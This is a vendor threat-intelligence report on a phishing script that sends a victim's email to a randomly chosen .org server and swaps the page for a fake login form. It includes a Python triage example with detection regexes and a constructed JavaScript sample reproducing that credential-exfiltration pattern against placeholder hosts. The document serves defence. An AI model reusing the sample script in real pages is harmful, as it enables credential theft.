Unpacking the Phishing Script Behind a Server-Orchestrated Deception

October 22, 2025

By: Marie Mamaril, Intelligence Team

A cunning new phishing attack is bypassing Secure Email Gateways (SEGs) and evading perimeter defences. It uses a rare, sophisticated phishing script with random domain selection and dynamic server-driven page replacement, making it highly effective at stealing credentials and evading detection. Understanding this threat is essential to improving defenses.

Cofense Intelligence spotted this unusual tactic in early February 2025, and it is ongoing. The script, embedded in malicious web pages or email attachments, exemplifies advanced phishing tactics that prioritize speed, precision, and deception.

In the tactic, the script picks a random .org domain from a hardcoded, predefined list. The .org domains on the list appear to be dynamically generated in bulk without using words, likely in an attempt to bypass block lists or AI/ML tools designed to block domains based on certain word structures. The script then generates a dynamic UUID (Universal Unique Identifier), which can be used to track victims and serve as a campaign identifier, suggesting that this script may be part of a package that can be reused in different campaigns, potentially with different spoofed brands on credential phishing pages. The script then sends an HTTP(s) POST to the random server that enables the server to respond with a dynamically generated login form based on the victim’s context (e.g., targeting enterprise users with a personalized corporate login page).

While the POST request is not the final stop in the script’s execution, this serves as a pivotal step in the phishing attack, triggering further actions that manipulate the user’s browser session and potentially extend the attack.

This report analyzes the phishing script’s mechanics, highlighting its unique features—random domain selection, UUID generation, and dynamic page replacement— and the threat actors' customized approach to credential phishing page design.

Key Points

  • Unlike most phishing attacks that use components from multiple servers, this script picks one .org address at random, making automated analysis and blocking of the script source difficult.
  • The script’s use of hardcoded UUIDs unique to each campaign and dynamically generated UUIDs unique to each session mimics legitimate API identifiers; this dual UUID approach is unusual for its sophisticated, campaign-specific tracking. 
  • Most campaigns observed use HTML-based attachments and spoofed file-sharing sites (like Microsoft OneDrive/SharePoint Online, DocuSign, Adobe Acrobat Sign, etc.) to deliver the malicious URLs wherein the JavaScript is embedded.

The Bait: Phishing Campaign

The phishing indicators of compromise (IOCs) observed in this campaign are delivered via two primary vectors: 

  1. The phishing email contains HTML-based attachments that, when opened, contain an embedded URL that automatically leads to a credential phishing page. 
  2. Emails with embedded links that spoof cloud collaboration platforms like Microsoft OneDrive (or SharePoint Online), DocuSign, Google Docs, and Adobe Sign.



Figure 1: Phishing email using Microsoft OneDrive/SharePoint Online to deliver the malicious URL

Anatomy of the JavaScript

The JavaScript snippet shown in Figure 3 takes a different approach from traditional phishing scripts, which often rely on redundant domain retries and static redirects. Its three standout tactics are random domain selection with no failover or redundancy (there is no retry loop, and error handling goes no further than console.log(xhr)), UUID generation, and dynamic page replacement. Dynamic page replacement means swapping a web page's content for attacker-controlled material, such as a fake login page, without changing the web address.

It’s significant because it deceives users and successfully evades security tools. This happens after a user interacts with a malicious webpage (e.g., clicking a link in a phishing email or inputting credentials). Instead of redirecting the user to a new website, the script swaps out the current page’s content with a fake login page designed to steal passwords or other sensitive information.


Figure 2: A fake Microsoft credential phishing page rendered without a redirect.

Analyzing the script, we can see that it starts by loading jQuery from a legitimate source for hosting popular web libraries (cdnjs[.]cloudflare[.]com), a common web tool that lets the script manipulate the page quietly in the background. It then defines a series of helper functions, starting with one that checks whether a string (such as a Base64-encoded email address) is Base64-encoded.

Function          Description

isBase64():       Checks if a string is Base64-encoded (used to decode an email address if present).
checkIfEmail():   Validates if a string is an email address.
uuidv4():         Generates a random unique ID (e.g., for tracking individual victims).

If the string is indeed Base64-encoded, the page rewrites itself with whatever the server sends back, typically a login page tailored to phish for credentials with a company logo that corresponds to the domain name from the entered email address. 

Figure 3: The phishing script's JavaScript snippet referenced above (image not reproduced).

Random Domain Selection

After kicking off a series of functions (loading jQuery, checking whether a string is Base64-encoded, validating an email address, and generating a random ID), the script's most intriguing step is selecting a domain from a list of bizarre, seemingly random .org domains. The script selects a single domain from a list of nine .org domains using Math.random() and sends an HTTPS POST request containing a JSON payload to hxxps://[chosen-domain]/api/v3/auth, as seen in Figure 5, with the following fields:

uuid: A hardcoded UUID used to track the campaign (6fafd0343-d771-4987-a760-25e5b31b44f for this campaign).

identifier: A dynamically generated UUID used to track the session (uniqueId via uuidv4()).

server: The randomly selected .org domain used to serve credential phishing content.

user: A plain text email address (from cfg, if valid).

What makes this tactic uncommon is that while most phishing scripts typically try multiple domains to ensure successful exfiltration, this script’s lack of failover means it relies only on one domain per execution (which might be riskier for the attacker). This either indicates the threat actor’s design preference for simplicity, or it is intended for a campaign suited for high-volume or broad-targeted attacks where some failures are acceptable. 

The code snippet illustrates this tactic:


Figure 4: JavaScript phishing script selecting a random .org domain for a POST request to mimic legitimate API traffic.

This approach of using random domains without failover logic reduces network traffic, making it harder for intrusion detection systems (IDS) to flag multiple failed requests. 

Additionally, the exclusive use of .org domains, which are widely trusted and less likely to be blocked than easy-to-register and frequently abused TLDs like .dev or .xyz, enhances the tactic's effectiveness. It also suggests a deliberate choice to leverage the TLD's trusted reputation, possibly for a campaign targeting organizations.

As seen in our Q3 2024 Phishing Intelligence Trends Review, .org is not heavily exploited compared to .com due to its perceived legitimacy, aligning with this script’s design.

By minimizing requests, the attacker evades DNS monitoring and rate-limiting, critical in targeted spearphishing campaigns (MITRE T1566.002 - Phishing: Spearphishing Link). 

Usage of Dual UUID Generation

The script generates a universally unique identifier (UUID) using uuidv4() and includes a hardcoded UUID (6fafd0343-d771-4987-a760-25e5b31b44f) in the payload.

The hardcoded UUID (6fafd0343-d771-4987-a760-25e5b31b44f) likely serves as a campaign identifier or might be used as a specific target marker to a specific phishing campaign or victim group, while the dynamic UUID (uuidv4()) tracks individual victims, enabling the attacker to correlate exfiltrated data.


Figure 5: Details sent to the server include a hardcoded UUID, an identifier unique to each credential phishing session, the randomized server where the harvested credentials are sent, and the email address entered into the phishing page.

Server-Driven Deception - Dynamic Page Replacement

The script’s most deceptive tactic is replacing the entire page with server-provided content, manipulating the browser session to deliver a credential phishing page. The server-driven nature of “resp.message” allows attackers to tailor content, enhancing deception.

The tactic supports a seamless user experience, critical for maintaining victim trust in the phishing page’s legitimacy. Unlike common phishing scripts that redirect (window.location.href), this tactic aligns with MITRE T1185 (Browser Session Hijacking), as it controls the user’s session to extend the attack. 

The code in Figure 6 demonstrates this.


Figure 6: Part of the script that shows dynamically replacing a webpage with server-provided content, such as a fake login page, after a successful POST request.
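As an added defender-side example (not code from the report or the script it analyzes), the following static triage check scores an HTML attachment against the indicators described in the Random Domain Selection, Dual UUID and Dynamic Page Replacement sections: an array of wordless .org domains picked via Math.random(), a POST to /api/v3/auth carrying uuid/identifier/server/user fields, and whole-page replacement from the server response. The attachment fragment, its domain names and the campaign UUID placeholder are constructed; it assumes the inline script is not obfuscated.

```python
"""Static triage of an HTML attachment for the server-orchestrated phishing
script pattern. Assumption: the inline script is plain (unobfuscated) text."""
import re

# Indicator regexes derived from the report's description (constructed here).
INDICATORS = {
    "org_domain_array": re.compile(r'\[\s*(?:"[^"]+\.org"\s*,?\s*){3,}\]'),
    "random_selection": re.compile(r'Math\.random\(\)'),
    "auth_endpoint":    re.compile(r'/api/v3/auth'),
    "payload_fields":   re.compile(r'\b(uuid|identifier|server|user)\s*:'),
    "page_replacement": re.compile(r'document\.(write|open)|\.innerHTML\s*=|\.html\('),
    "jquery_cdn":       re.compile(r'cdnjs\.cloudflare\.com/ajax/libs/jquery'),
}

# Constructed attachment fragment mirroring the reported structure; the domains
# are invented and the campaign UUID is a placeholder, so nothing here is live.
SAMPLE = '''<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script>
var servers = ["qzxv-example.org", "pltrm-example.org", "kwjd-example.org"];
var server = servers[Math.floor(Math.random() * servers.length)];
var payload = {uuid: "CAMPAIGN-UUID-PLACEHOLDER", identifier: uuidv4(), server: server, user: cfg};
$.ajax({url: "https://" + server + "/api/v3/auth", type: "POST", data: JSON.stringify(payload),
  success: function(resp){ document.open(); document.write(resp.message); document.close(); }});
</script>'''

# Constructed benign attachment: an ordinary login form with no script.
BENIGN = '<form action="/login"><input name="user"><input name="pass"></form>'


def extract_org_domains(html):
    """Return the sorted set of quoted .org domains found in the attachment."""
    return sorted(set(re.findall(r'"([a-z0-9-]+\.org)"', html)))


def score_attachment(html):
    """Return (score, hit_names): how many indicators matched and which."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    # The payload indicator only counts when all four reported keys are present.
    fields = {m.group(1) for m in INDICATORS["payload_fields"].finditer(html)}
    if "payload_fields" in hits and fields != {"uuid", "identifier", "server", "user"}:
        hits.remove("payload_fields")
    return len(hits), hits


def is_suspicious(html, threshold=4):
    """Flag the attachment when enough independent indicators co-occur."""
    return score_attachment(html)[0] >= threshold
```

The threshold is deliberately conservative: jQuery from a CDN or a lone Math.random() is common in legitimate pages, so the verdict rests on the combination of indicators rather than any single one.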


Understanding the constantly evolving tactics and tools used in phishing attacks is critical to staying ahead of potential threats. Cofense Phishing Detection and Response platform provides comprehensive solutions designed to detect, analyze, and mitigate these threats effectively. To see how Cofense can help safeguard your organization against phishing attacks, schedule a demo today and take the first step toward a more secure future.